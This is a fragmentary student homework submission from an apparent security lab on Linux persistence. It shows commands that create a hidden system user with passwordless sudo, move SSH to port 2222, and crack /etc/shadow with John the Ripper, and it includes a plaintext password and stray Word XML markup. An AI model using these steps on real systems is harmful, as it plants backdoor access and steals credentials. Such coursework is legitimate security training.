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n96whb08sr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6 Homework Submission File: Advanced Bash - Owning the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Shadow People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secret user named sysd. Make sure this user doesn't have a home folder created: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 useradd -u 201 -g 201 -M sysd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Give your secret user a password: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passwd passwd sysd :Taylor0709!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a system UID &lt; 1000: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useradd -u 201 -g 201 -M sysd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the same GID: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useradd -u 201 -g 201 -M sysd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full sudo access without the need for a password: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visudo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that sudo access works without your password: </w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Your bash commands here sudo -l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Smooth Sailing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Edit the sshd_config file:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Your bash commands here nano /etc/ssh/sshd_config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 22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 2222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Restart the SSH service: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systemctl restart ssh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Exit the root account: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exit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SSH to the target machine using your sysd account and port 2222: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ssh sysd@192.168.6.105 -p 2222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sudo to switch to the root user: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sudo su root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Crack All the Passwords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SSH back to the system using your sysd account and port 2222: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ssh sysadmin@192.168.6.105 -p 2222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Escalate your privileges to the root user. Use John to crack the entire /etc/shadow file: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solution command here sudo john /etc/shadow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